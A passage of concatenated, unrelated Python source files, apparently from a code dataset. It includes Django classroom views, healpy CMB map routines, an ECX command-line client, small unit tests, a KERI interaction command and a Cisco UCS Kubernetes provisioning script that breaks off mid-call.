messages.add_message(request,messages.WARNING,"Submission link is closed.")
else:
form = SubmitAssignmentForm(instance=submission_object)
params={
'assignment':assignment,
'extension':extension_type(assignment.file),
'subject':subject,
'form':form,
'updateform':updateform,
'classroom':classroom,
'submissionform':form,
'submission':submission,
'submission_object':submission_object,
'is_teacher':is_teacher,
}
return render(request,'assignments/assignment_detail.html',params)
@login_required#checked
def assignment_handle(request,unique_id,subject_id,id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
is_admin = classroom.special_permissions.filter(username = request.user.username).exists()
subject = get_object_or_404(Subject,id=subject_id)
is_teacher = request.user==subject.teacher
if is_admin or is_teacher:
assignment = Assignment.objects.get(id=id)
if request.POST.get('marks_assigned'):
id = request.POST.get('id')
submission = Submission.objects.get(id=id)
marks = request.POST.get('marks_assigned')
submission.marks_assigned = marks
submission.save()
url = reverse('assignment_page',kwargs={'unique_id':classroom.unique_id,'subject_id':subject.id,'id':assignment.id})
notify.send(sender=request.user,verb=f'You got {marks} for your assignment {assignment.topic}',recipient=submission.submitted_by,url =url)
email_marks(request,submission,assignment)
return redirect(reverse('assignment-handle',kwargs={
'unique_id':classroom.unique_id,
'subject_id':subject.id,
'id':assignment.id
}))
#list of submissions
all_submissions = Submission.objects.filter(assignment=assignment)
late_submissions = all_submissions.filter(submitted_on__gt=assignment.submission_date)
ontime_submissions = all_submissions.filter(submitted_on__lte=assignment.submission_date)
members = classroom.members.all()
teachers = classroom.teacher.all()
students = members.difference(teachers)
submitted = assignment.submitted_by.all()
not_submitted = students.difference(submitted)
if request.POST.get('send_reminder')=='1':
recepients = User.objects.filter(username__in=not_submitted.values_list('username', flat=True))
url = reverse('assignment_page',kwargs={'unique_id':classroom.unique_id,'subject_id':subject.id,'id':assignment.id})
notify.send(sender=request.user,verb=f"Reminder to submit your assignment",recipient=recepients,url=url)
send_reminder(request,assignment,not_submitted.values_list('email', flat=True))
if request.POST.get('toggle_link'):
if assignment.submission_link:
assignment.submission_link = False
else:
assignment.submission_link = True
assignment.save()
params = {
'assignment':assignment,
'all_submissions':all_submissions,
'late_submissions':late_submissions,
'ontime_submissions':ontime_submissions,
'is_teacher':is_teacher,
'submitted':submitted,
'not_submitted':not_submitted,
'subject':subject,
'classroom':classroom,
}
return render(request,'assignments/assignment_handle.html',params)
else:
raise Http404()
@login_required#checked
def assignment_delete(request,unique_id,subject_id,id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
subject = get_object_or_404(Subject,id=subject_id)
assignment = get_object_or_404(Assignment,id=id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or request.user==subject.teacher
if is_teacher:
assignment.delete()
assignment_delete_notify(request,assignment)
return redirect(reverse('assignment_page',kwargs={'unique_id':classroom.unique_id,'subject_id':subject.id}))
else:
raise Http404()
@login_required#checked
def announcements_list(request, unique_id, subject_id,form = None):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user, classroom):
#querysets
subject = get_object_or_404(Subject,id=subject_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or request.user==subject.teacher
announcements = Announcement.objects.all().filter(subject_name=subject).reverse()
if request.GET.get('search'):
search = request.GET.get('search')
announcements = announcements.filter(Q(subject__icontains=search)|Q(description__icontains=search))
query,page_range = pagination(request,announcements)
announcements=query.object_list
#announcement form handling
if is_teacher:
if request.method=="POST":
form = AnnouncementForm(request.POST,request.FILES)
if form.is_valid():
announcement = form.save(commit=False)
announcement.subject_name = subject
announcement.announced_by = request.user
announcement.save()
return redirect(reverse('announcement',kwargs=
{'unique_id':classroom.unique_id,'subject_id':subject.id}))
else:
form= AnnouncementForm()
params={
'form':form,
'subject':subject,
'classroom':classroom,
'announcements':announcements,
'page':query,
'page_range':page_range,
'is_teacher':is_teacher
}
return render(request,'announcements/announcement_list.html',params)
@login_required#checked
def announcement_details(request,unique_id,subject_id,id,form = None):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user, classroom):
subject = get_object_or_404(Subject,id=subject_id)
announcement = get_object_or_404(Announcement,id=id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or request.user==subject.teacher
#announcement update handling
if is_teacher:
if request.method=="POST":
form = AnnouncementForm(request.POST,request.FILES,instance=announcement)
if form.is_valid():
announcementform = form.save(commit=False)
announcementform.subject_name = subject
announcementform.save()
return redirect(reverse('announcement_page',kwargs={
'unique_id':classroom.unique_id,
'subject_id':subject.id,
'id':announcement.id
}))
else:
form= AnnouncementForm(instance=announcement)
params={
'announcement':announcement,
'extension':extension_type(announcement.file),
'subject':subject,
'updateform':form,
'classroom':classroom,
'is_teacher':is_teacher,
}
return render(request,'announcements/announcement_details.html',params)
@login_required #checked
def announcement_delete(request,unique_id,subject_id,id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
subject = get_object_or_404(Subject,id=subject_id)
announcement = get_object_or_404(Announcement,id=id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or request.user==subject.teacher
#notify
if is_teacher:
announcement.delete()
announcement_delete_notify(request,announcement)
return redirect(reverse('announcement',kwargs={
'unique_id':classroom.unique_id,
'subject_id':subject.id
}))
else:
raise Http404()
@login_required #checked
def subject_details(request,unique_id, subject_id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user, classroom):
subject = get_object_or_404(Subject,id=subject_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
upload_permission = subject.upload_permission.all()
members = classroom.members.all()
admins = classroom.special_permissions.all()
teachers = classroom.teacher.all()
teacher = subject.teacher
members = list((admins| members.difference(teachers)).distinct())
if teacher not in members:
members.append(teacher)
activities = Subject_activity.objects.filter(subject=subject).reverse()
query,page_range = pagination(request,activities)
activities=query.object_list
if request.method=='POST':
form = SubjectEditForm(request.POST , request.FILES,instance=subject)
if form.is_valid():
form.save()
else:
form = SubjectEditForm(instance=subject)
params={
'subject':subject,
'classroom':classroom,
'is_teacher':admin_check,
'members':members,
'upload_permissions':upload_permission,
'admins':admins,
'teacher':teacher,
'page':query,
'page_range':page_range,
'form':form
}
return render(request,'subject_details.html',params)
@login_required #checked
def delete_subject(request,unique_id, subject_id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
subject = get_object_or_404(Subject,id=subject_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
if admin_check:
verb = "A Subject "+subject.subject_name + " is deleted by "+ request.user.username
url =reverse('subjects',kwargs={'unique_id':classroom.unique_id})
recipient = User.objects.filter(username__in=classroom.members.values_list('username', flat=True))
notify.send(sender=request.user,verb=verb,recipient=recipient,url=url)
subject.delete()
return redirect(url)
else:
raise Http404()
@login_required #checked
def remove_member(request,unique_id,username):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
remove_this_user = get_object_or_404(User,username=username)
url = reverse('classroom_page',kwargs={'unique_id':classroom.unique_id})
if admin_check or request.user==remove_this_user:
if remove_this_user == classroom.created_by:
messages.add_message(request,messages.WARNING,"This user can't be dropped. He has created this classroom.")
return redirect(url)
classroom.members.remove(remove_this_user)
classroom.teacher.remove(remove_this_user)
classroom.special_permissions.remove(remove_this_user)
verb = f"You are removed from {classroom.class_name}"
notify.send(sender=request.user,verb=verb,recipient=remove_this_user,url='#')
if request.user==remove_this_user:
return redirect(reverse('homepage'))
else:
return redirect(url)
else:
raise Http404()
@login_required #checked
def accept_request(request,unique_id,username):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
if admin_check:
user = get_object_or_404(User,username=username)
classroom.members.add(user)
classroom.pending_members.remove(user)
user.profile.pending_invitations.remove(classroom)
url = reverse('subjects',kwargs={'unique_id':classroom.unique_id})
verb = f'Yor request to join classroom {classroom.class_name} is accepted'
notify.send(sender=request.user,verb=verb,recipient=user,url=url)
return redirect(reverse('classroom_page',kwargs={'unique_id':classroom.unique_id}))
@login_required#checked
def delete_request(request,unique_id,username):
""" If you don't want to accept the request """
classroom = get_object_or_404(Classroom,unique_id=unique_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
if admin_check:
user = User.objects.get(username=username)
classroom.pending_members.remove(user)
verb = "Your request to join class {classroom.class_name} is rejected"
url = "#"
notify.send(sender=request.user,verb=verb,recipient=user,url=url)
return redirect(reverse('classroom_page',kwargs={'unique_id':classroom.unique_id}))
@login_required #checked
def manage_upload_permission(request,unique_id,subject_id,username):
classroom = Classroom.objects.get(unique_id=unique_id)
if member_check(request.user,classroom):
user = User.objects.get(username=username)
subject = Subject.objects.get(id=subject_id)
check = subject.upload_permission.filter(username = user.username).exists()
url = reverse('subjects',kwargs={'unique_id':classroom.unique_id})
if check:
verb = f"You can't upload notes in {subject.subject_name} of {classroom.class_name} anymore"
notify.send(sender=request.user,verb=verb,recipient=user,url = url)
subject.upload_permission.remove(user)
else:
verb = f"You got permission to upload notes in {subject.subject_name} of {classroom.class_name}"
subject.upload_permission.add(user)
notify.send(sender=request.user,verb=verb,recipient=user,url = url)
return redirect(reverse('subject_details',kwargs={'unique_id':classroom.unique_id,'subject_id':subject.id}))
@login_required#checked
def unsend_request(request,unique_id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if classroom in request.user.profile.pending_invitations.all():
request.user.profile.pending_invitations.remove(classroom)
classroom.pending_members.remove(request.user)
return redirect(reverse('profile',kwargs={
'username':request.user.username
}))
else:
raise Http404()
@login_required#checked
def export_marks(request,unique_id,subject_id,id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
subject = get_object_or_404(Subject,id=subject_id)
if admin_check or request.user==subject.teacher:
assignment = get_object_or_404(Assignment,id=id)
response = HttpResponse(content_type='application/ms-excel')
response['Content-Disposition'] = f'attachment; filename="mark_sheet of {assignment.topic}.xls"'
wb = xlwt.Workbook(encoding='utf-8')
ws = wb.add_sheet('Submissions')
# Sheet header, first row
row_num = 0
font_style = xlwt.XFStyle()
font_style.font.bold = True
columns = ['Username','submitted_on','marks_obtained']
for col_num in range(len(columns)):
ws.write(row_num, col_num, columns[col_num], font_style)
# Sheet body, remaining rows
font_style = xlwt.XFStyle()
rows = Submission.objects.all().filter(assignment=assignment).values_list('submitted_by','submitted_on','marks_assigned')
rows = [[x.strftime("%Y-%m-%d %H:%M") if isinstance(x, datetime.datetime) else x for x in row] for row in rows ]
for row in rows:
row_num += 1
row[0]=str(User.objects.get(id=row[0]))
for col_num in range(len(row)):
ws.write(row_num, col_num, row[col_num], font_style)
wb.save(response)
return response
else:
raise Http404()
def features(request):
return render(request, 'features.html')
def privacy(request):
return render(request, 'privacy.html') | python |
import healpy as hp
import numpy as np
def iqu2teb(IQU, nside, lmax=None):
alms = hp.map2alm(IQU, lmax=lmax, pol=True)
return hp.alm2map(alms, nside=nside, lmax=lmax, pol=False)
def teb2iqu(TEB, nside, lmax=None):
alms = hp.map2alm(TEB, lmax=lmax, pol=False)
return hp.alm2map(alms, nside=nside, lmax=lmax, pol=True)
def messenger_1(data_vec, T_pixel, n_iter, s_cov_diag_grade, nside, noise_bar_diag, noise_diag):
s = np.zeros(data_vec.shape, dtype='complex')
T_harmonic_grade = np.ones(hp.map2alm(hp.ud_grade(data_vec.real, nside),
lmax=nside * 3 - 1).shape) * T_pixel[0] / np.float(nside * nside)
harmonic_operator = (s_cov_diag_grade / (s_cov_diag_grade + T_harmonic_grade))
pixel_operator_signal = (noise_bar_diag / (noise_bar_diag + T_pixel))
pixel_operator_data = (T_pixel / (T_pixel + noise_diag))
for i in range(n_iter):
t = pixel_operator_data * data_vec + pixel_operator_signal * s
# t = hp.ud_grade(t,512)
t_alm1 = hp.map2alm(t.real, lmax=3 * nside - 1)
t_alm2 = hp.map2alm(t.imag, lmax=3 * nside - 1)
s1 = hp.alm2map(harmonic_operator * t_alm1, nside=nside, lmax=nside * 3 - 1, verbose=False)
s2 = hp.alm2map(harmonic_operator * t_alm2, nside=nside, lmax=nside * 3 - 1, verbose=False)
s = s1 + 1j * s2
# s = hp.ud_grade(s, 128)
# _ = hp.mollview(s.imag), plt.show()
print(np.var(s))
return s
def messenger_2(data_vec, s_cov_diag, T_ell, noise_diag, T_pixel, noise_bar_diag, nside, n_iter):
data_vec_QU = np.concatenate([data_vec.real, data_vec.imag])
s = np.zeros(data_vec_QU.shape, dtype='complex')
convergence_test = [0.]
harmonic_operator = s_cov_diag / (s_cov_diag + T_ell)
pixel_operator_signal = (noise_bar_diag / (noise_bar_diag + T_pixel))
pixel_operator_data = (T_pixel / (T_pixel + noise_diag))
for i in range(n_iter):
t = pixel_operator_data * data_vec_QU + pixel_operator_signal * s # here t = concat[t_Q, t_U]
t = np.real(t)
t = [t[int(t.shape[0] / 2):] * 0., t[:int(t.shape[0] / 2)], t[int(t.shape[0] / 2):]] # here t = {t_I = 0, t_Q, t_U}
t = hp.ud_grade(t, nside) # now upgrade
t_alm = hp.map2alm(t, lmax=3 * (nside) - 1, pol=True)
s = harmonic_operator * np.concatenate([t_alm[1], t_alm[2]])
s = [s[int(s.shape[0] / 2):] * 0., s[:int(s.shape[0] / 2)], s[int(s.shape[0] / 2):]]
print(np.var(s[0]), np.var(s[1]), np.var(s[2]))
convergence_test.append(np.var(s[1]))
s = hp.alm2map(s, nside=nside, lmax=nside * 3 - 1, verbose=False, pol=True)
# s_qu = np.copy(s)
s = np.concatenate([s[1], s[2]])
return s | python |
# Copyright 2014 Pierre de Buyl
#
# This file is part of pmi-h5py
#
# pmi-h5py is free software and is licensed under the modified BSD license (see
# LICENSE file).
import test_pmi_mod
mytest = test_pmi_mod.MyTest('myllfile.h5', 1024)
mytest.fill()
mytest.close()
| python |
#!/usr/bin/env python
#-*- mode: Python;-*-
import ConfigParser
import json
import logging
import os
import sys
import tempfile
import traceback
import click
from requests.exceptions import HTTPError
from ecxclient.sdk import client
import util
cmd_folder = os.path.abspath(os.path.join(os.path.dirname(__file__), 'commands'))
class MyCLI(click.MultiCommand):
def list_commands(self, ctx):
rv = []
for filename in os.listdir(cmd_folder):
if filename.endswith('.py') and filename.startswith('cmd_'):
rv.append(filename[4:-3])
rv.sort()
return rv
def get_command(self, ctx, name):
try:
if sys.version_info[0] == 2:
name = name.encode('ascii', 'replace')
mod = __import__('ecxclient.cli.commands.cmd_' + name, None, None, ['cli'])
except ImportError:
logging.error(traceback.format_exc())
return
return mod.cli
def get_existing_session(username):
parser = ConfigParser.RawConfigParser()
parser.read([cfgfile])
try:
return parser.get(username, 'sessionid')
except ConfigParser.NoSectionError:
raise Exception('Please provide login credentials.')
def save_config(username, sessionid):
parser = ConfigParser.RawConfigParser()
parser.add_section(username)
parser.set(username, 'sessionid', sessionid)
parser.write(open(cfgfile, 'wb'))
@click.command(cls=MyCLI)
@click.option('--url', envvar='ECX_URL', default='http://localhost:8082', metavar='URL', help='ECX url.')
@click.option('--user', envvar='ECX_USER', default='admin', metavar='USERNAME', help='ECX user.')
@click.option('--passwd', envvar='ECX_PASSWD', default=None, metavar='PASSWORD', help='ECX password.')
@click.option('--json', is_flag=True, help='Show raw json.')
@click.option('--links', is_flag=True, help='Include links in output. Implies --json option.')
@click.version_option('0.43')
@util.pass_context
def cli(ctx, url, user, passwd, json, links):
"""ecx is a command line tool with which ECX operations
can be carried out.
"""
if user and passwd:
ctx.ecx_session = client.EcxSession(url, username=user, password=passwd)
save_config(user, ctx.ecx_session.sessionid)
else:
ctx.ecx_session = client.EcxSession(url, sessionid=get_existing_session(user))
ctx.json = json
ctx.links = links
if ctx.links:
ctx.json = True
# cli = MyCLI(help='Script to perform ECX operations. ')
def init_logging():
fd, logfile = tempfile.mkstemp(suffix='.txt', prefix='ecxclient')
os.close(fd)
logging.basicConfig(filename=logfile, level=logging.DEBUG, format='%(asctime)-15s: %(levelname)s: %(message)s')
def process_http_error(e):
if not isinstance(e, HTTPError):
return
if not e.response.content:
return
logging.error(e.response.content)
try:
d = json.loads(e.response.content)
click.secho('%s (%s)' % (d.get('id', 'Unknown'), d.get('description', 'Unknown')), fg='red')
except Exception:
pass
def main():
global cfgfile
init_logging()
cfgfile = os.path.join(click.get_app_dir("ecxcli"), 'config.ini')
cfgdir = os.path.dirname(cfgfile)
if not os.path.exists(cfgdir):
os.makedirs(cfgdir)
try:
cli()
except Exception as e:
logging.error(traceback.format_exc())
exctype, value = sys.exc_info()[:2]
click.secho(traceback.format_exception_only(exctype, value)[0], fg='red')
process_http_error(e)
| python |
"""
Copyright (c) Contributors to the Open 3D Engine Project. For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
import unittest.mock as mock
import unittest
import time
import pytest
import ly_test_tools.environment.waiter
pytestmark = pytest.mark.SUITE_smoke
@mock.patch('time.sleep', mock.MagicMock)
class TestWaitFor(unittest.TestCase):
def test_WaitForFunctionCall_GivenExceptionTimeoutExceeded_RaiseException(self):
input_func = mock.MagicMock()
input_func.return_value = False
with self.assertRaises(Exception):
ly_test_tools.environment.waiter.wait_for(input_func, .001, Exception, 0)
def test_WaitForFunctionCall_TimeoutExceeded_RaiseAssertionError(self):
input_func = mock.MagicMock()
input_func.return_value = False
with self.assertRaises(Exception):
ly_test_tools.environment.waiter.wait_for(input_func, .001, interval=0)
def test_WaitForFunctionCall_TimeoutExceeded_EnoughTime(self):
input_func = mock.MagicMock()
input_func.return_value = False
timeout_end = time.time() + 0.1
try:
ly_test_tools.environment.waiter.wait_for(input_func, 0.1, Exception, interval=0.01)
except Exception:
pass
# It should have taken at least 1/10 second
assert time.time() > timeout_end | python |
# -*- encoding: utf-8 -*-
"""
keri.kli.commands module
"""
import argparse
import json
from hio.base import doing
from keri import kering
from keri.db import basing
from ... import habbing, keeping, agenting, indirecting, directing
parser = argparse.ArgumentParser(description='Rotate keys')
parser.set_defaults(handler=lambda args: interact(args))
parser.add_argument('--name', '-n', help='Human readable reference', required=True)
parser.add_argument('--proto', '-p', help='Protocol to use when propagating ICP to witnesses [tcp|http] (defaults '
'http)', default="tcp")
parser.add_argument('--data', '-d', help='Anchor data, \'@\' allowed', default=[], action="store", required=False)
def interact(args):
"""
Performs a rotation of the identifier of the environment represented by the provided name parameter
args (parseargs): Command line argument
"""
name = args.name
if args.data is not None:
try:
if args.data.startswith("@"):
f = open(args.data[1:], "r")
data = json.load(f)
else:
data = json.loads(args.data)
except json.JSONDecodeError:
raise kering.ConfigurationError("data supplied must be value JSON to anchor in a seal")
if not isinstance(data, list):
data = [data]
else:
data = None
ixnDoer = InteractDoer(name=name, proto=args.proto, data=data)
doers = [ixnDoer]
try:
directing.runController(doers=doers, expire=0.0)
except kering.ConfigurationError:
print(f"identifier prefix for {name} does not exist, incept must be run first", )
return -1
except kering.ValidationError as ex:
return -1
class InteractDoer(doing.DoDoer):
"""
DoDoer that launches Doers needed to create an interaction event and publication of the event
to all appropriate witnesses
"""
def __init__(self, name, proto, data: list = None):
"""
Returns DoDoer with all registered Doers needed to perform interaction event.
Parameters:
name is human readable str of identifier
proto is tcp or http method for communicating with Witness
data is list of dicts of committed data such as seals
"""
self.name = name
self.proto = proto
self.data = data
ks = keeping.Keeper(name=self.name, temp=False) # not opened by default, doer opens
self.ksDoer = keeping.KeeperDoer(keeper=ks) # doer do reopens if not opened and closes
db = basing.Baser(name=self.name, temp=False, reload=True) # not opened by default, doer opens
self.dbDoer = basing.BaserDoer(baser=db) # doer do reopens if not opened and closes
self.hab = habbing.Habitat(name=self.name, ks=ks, db=db, temp=False, create=False)
self.habDoer = habbing.HabitatDoer(habitat=self.hab) # setup doer
doers = [self.ksDoer, self.dbDoer, self.habDoer, doing.doify(self.interactDo)]
super(InteractDoer, self).__init__(doers=doers)
def interactDo(self, tymth, tock=0.0, **opts):
"""
Returns: doifiable Doist compatible generator method
Usage:
add result of doify on this method to doers list
"""
self.wind(tymth)
self.tock = tock
_ = (yield self.tock)
msg = self.hab.interact(data=self.data)
if self.proto == "tcp":
mbx = None
witDoer = agenting.WitnessReceiptor(hab=self.hab, klas=agenting.TCPWitnesser, msg=msg)
self.extend(doers=[witDoer])
yield self.tock
else: # "http"
mbx = indirecting.MailboxDirector(hab=self.hab)
witDoer = agenting.WitnessReceiptor(hab=self.hab, klas=agenting.HTTPWitnesser, msg=msg)
self.extend(doers=[mbx, witDoer])
yield self.tock
while not witDoer.done:
_ = yield self.tock
print(f'Prefix {self.hab.pre}')
print(f'New Sequence No. {self.hab.kever.sn}')
for idx, verfer in enumerate(self.hab.kever.verfers):
print(f'\tPublic key {idx+1}: {verfer.qb64}')
toRemove = [self.ksDoer, self.dbDoer, self.habDoer, witDoer]
if mbx:
toRemove.append(mbx)
self.remove(toRemove)
return
| python |
from ucsmsdk.ucsexception import UcsException
import re, sys
# given an array and a string of numbers, make sure they are all in the array:
#
def check_values(array, csv):
indexes = csv.split(',')
for i in indexes:
try:
i = int(i) - 1
except:
print "bad value: " + i
return False
if i < 0 or i > len(array) - 1:
return False
return True
# get the available servers to put in the pool.
def select_kube_servers(handle):
from ucsmsdk.mometa.compute.ComputeRackUnit import ComputeRackUnit
from ucsmsdk.mometa.fabric.FabricComputeSlotEp import FabricComputeSlotEp
print "Listing Available UCS Servers"
filter_string = '(presence, "equipped")'
# get blades
blades = handle.query_classid("fabricComputeSlotEp", filter_string)
# get all connected rack mount servers.
servers = handle.query_classid("computeRackUnit")
m = blades + servers
while True:
for i, s in enumerate(m):
if type(s) is FabricComputeSlotEp:
print "[%d]: Blade %s/%s type %s" % (i+1, s.chassis_id, s.rn, s.model)
if type(s) is ComputeRackUnit:
print "[%d]: Rack %s type %s" % (i+1, s.rn, s.model)
vals = raw_input("(E.g.: 2,4,8): ")
if check_values(m, vals) == True:
k8servers = [m[int(x)-1] for x in vals.split(',')]
print "Install Kubernetes on the following servers:"
for s in k8servers:
if type(s) is FabricComputeSlotEp:
print "\tBlade %s/%s type %s" % (s.chassis_id, s.rn, s.model)
if type(s) is ComputeRackUnit:
print "\tServer %s type %s" % (s.rn, s.model)
yn = raw_input("Is this correct? [N/y]: ")
if yn == "y" or yn == "Y":
return k8servers
def createKubeBootPolicy(handle):
print "Creating Kube Boot Policy"
from ucsmsdk.mometa.lsboot.LsbootPolicy import LsbootPolicy
from ucsmsdk.mometa.lsboot.LsbootVirtualMedia import LsbootVirtualMedia
from ucsmsdk.mometa.lsboot.LsbootStorage import LsbootStorage
from ucsmsdk.mometa.lsboot.LsbootLocalStorage import LsbootLocalStorage
from ucsmsdk.mometa.lsboot.LsbootDefaultLocalImage import LsbootDefaultLocalImage
mo = LsbootPolicy(parent_mo_or_dn="org-root", name="kube", descr="Kuberenetes", reboot_on_update="yes", policy_owner="local", enforce_vnic_name="yes", boot_mode="legacy")
mo_1 = LsbootVirtualMedia(parent_mo_or_dn=mo, access="read-only-remote-cimc", lun_id="0", order="2")
mo_2 = LsbootStorage(parent_mo_or_dn=mo, order="1")
mo_2_1 = LsbootLocalStorage(parent_mo_or_dn=mo_2, )
mo_2_1_1 = LsbootDefaultLocalImage(parent_mo_or_dn=mo_2_1, order="1")
handle.add_mo(mo, modify_present=True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def deleteKubeBootPolicy(handle):
mo = handle.query_dn("org-root/boot-policy-kube")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createKubeLocalDiskPolicy(handle):
print "Creating Kube Local Disk Policy"
from ucsmsdk.mometa.storage.StorageLocalDiskConfigPolicy import StorageLocalDiskConfigPolicy
mo = StorageLocalDiskConfigPolicy(parent_mo_or_dn="org-root", protect_config="no", name="kube", descr="Kubernetes", flex_flash_raid_reporting_state="disable", flex_flash_state="disable", policy_owner="local", mode="raid-mirrored")
handle.add_mo(mo)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def deleteKubeLocalDiskPolicy(handle):
print "Deleting Kube Local Disk Policy"
mo = handle.query_dn("org-root/local-disk-config-kube")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createKubeUUIDPools(handle):
print "Creating Kube UUID Pools"
from ucsmsdk.mometa.uuidpool.UuidpoolPool import UuidpoolPool
from ucsmsdk.mometa.uuidpool.UuidpoolBlock import UuidpoolBlock
mo = UuidpoolPool(parent_mo_or_dn="org-root", policy_owner="local", prefix="derived", descr="Kubernetes Pool", assignment_order="default", name="kube")
mo_1 = UuidpoolBlock(parent_mo_or_dn=mo, to="C888-888888888100", r_from="C888-888888888001")
handle.add_mo(mo)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def deleteKubeUUIDPools(handle):
print "Deleting Kube UUID Pool"
mo = handle.query_dn("org-root/uuid-pool-kube")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createKubeServerPool(handle):
print "Creating Kubernetes Compute Pool"
from ucsmsdk.mometa.compute.ComputePool import ComputePool
mo = ComputePool(parent_mo_or_dn="org-root", policy_owner="local", name="Kubernetes", descr="")
handle.add_mo(mo)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def addServersToKubePool(handle, servers):
print "Adding servers to Kubernetes Pool"
from ucsmsdk.mometa.compute.ComputePool import ComputePool
from ucsmsdk.mometa.compute.ComputePooledSlot import ComputePooledSlot
from ucsmsdk.mometa.compute.ComputePooledRackUnit import ComputePooledRackUnit
from ucsmsdk.mometa.compute.ComputeRackUnit import ComputeRackUnit
from ucsmsdk.mometa.fabric.FabricComputeSlotEp import FabricComputeSlotEp
mo = ComputePool(parent_mo_or_dn="org-root", policy_owner="local", name="Kubernetes", descr="")
for s in servers:
if type(s) is FabricComputeSlotEp:
ComputePooledSlot(parent_mo_or_dn=mo, slot_id=re.sub("slot-","", s.slot_id), chassis_id=str(s.chassis_id))
if type(s) is ComputeRackUnit:
ComputePooledRackUnit(parent_mo_or_dn=mo, id=re.sub("rack-unit-","", s.rn))
handle.add_mo(mo, True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def deleteKubeServerPool(handle):
print "Deleting Kubernetes Compute Pool"
mo = handle.query_dn("org-root/compute-pool-Kubernetes")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createServiceProfileTemplate(handle):
print "Creating Kubernetes Service Profile Template"
from ucsmsdk.mometa.ls.LsServer import LsServer
from ucsmsdk.mometa.vnic.VnicConnDef import VnicConnDef
from ucsmsdk.mometa.ls.LsRequirement import LsRequirement
from ucsmsdk.mometa.lstorage.LstorageProfileBinding import LstorageProfileBinding
mo = LsServer(parent_mo_or_dn="org-root",
policy_owner="local",
name="Kubernetes",
descr="Kubernetes Service Profile",
type="updating-template",
# Boot using Kubernetes Boot policy: local Disk, then Remote DVD
boot_policy_name="kube",
# Default Maintenance Policy
maint_policy_name="default",
# scrub policy
scrub_policy_name="kube",
# UUID Pool
ident_pool_name="kube",
# disks we use.
#local_disk_policy_name="kube",
#storage_profile_name="kube",
# virtual media policy
vmedia_policy_name="kube"
)
# create vNIC Connection Policy
VnicConnDef(parent_mo_or_dn=mo,
lan_conn_policy_name="kube")
# create server pool and add to template.
LsRequirement(parent_mo_or_dn=mo, name="Kubernetes")
# add storage profile.
mo_1 = LstorageProfileBinding(parent_mo_or_dn=mo, storage_profile_name="kube")
handle.add_mo(mo, True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
except Exception:
print Exception
def deleteServiceProfileTemplate(handle):
print "Deleting Kubernetes Service Profile Template"
print "Deleting Kubernetes Compute Pool"
mo = handle.query_dn("org-root/ls-Kubernetes")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createServers(handle, servers):
print "Creating Kubernetes Service Profiles"
from ucsmsdk.ucsmethodfactory import ls_instantiate_n_named_template
from ucsmsdk.ucsbasetype import DnSet, Dn
for i, s in enumerate(servers):
dn_set = DnSet()
dn = Dn()
sp_name = "kube0%d" % (i+1)
dn.attr_set("value",sp_name)
dn_set.child_add(dn)
elem = ls_instantiate_n_named_template(cookie=handle.cookie,
dn="org-root/ls-Kubernetes",
in_error_on_existing="true",
in_name_set=dn_set,
in_target_org="org-root",
in_hierarchical="false")
try:
mo_list = handle.process_xml_elem(elem)
except UcsException as err:
if err.error_code == "105":
print "\t" + sp_name + " already exists."
else:
print err
def deleteServers(handle):
print "Deleting Kubernetes Nodes"
filter_string = '(dn, "ls-kube[0-9]+", type="re")'
kube = handle.query_classid("lsServer", filter_string)
for k in kube:
print "Deleting " + k.name
handle.remove_mo(k)
try:
handle.commit()
except AttributeError:
print "\talready deleted"
except UcsException as err:
print "\t"+ k.name + ": " + err.error_descr
def createKubeVirtualMedia(handle):
print "Adding Virtual Media Policy"
from urlparse import urlparse
import os.path
yn = False
url = ""
while yn == False:
print "What is the URL for the Boot ISO image?"
url = raw_input("(E.g.: http://192.168.2.2/kubam/centos7.2-boot.iso) : ")
print "You entered: " + url
yn = raw_input("Is this correct? [y/N]: ")
if yn != "y":
yn = False
o = urlparse(url)
paths = os.path.split(o.path)
scheme = o.scheme # http, https
if scheme == "":
scheme = "http"
filename = paths[-1]
address = o.hostname
path = "/".join(paths[:-1])
name = ".".join(paths[-1].split(".")[:-1])
from ucsmsdk.mometa.cimcvmedia.CimcvmediaMountConfigPolicy import CimcvmediaMountConfigPolicy
from ucsmsdk.mometa.cimcvmedia.CimcvmediaConfigMountEntry import CimcvmediaConfigMountEntry
mo = CimcvmediaMountConfigPolicy(name="kube",
retry_on_mount_fail="yes",
parent_mo_or_dn="org-root",
policy_owner="local",
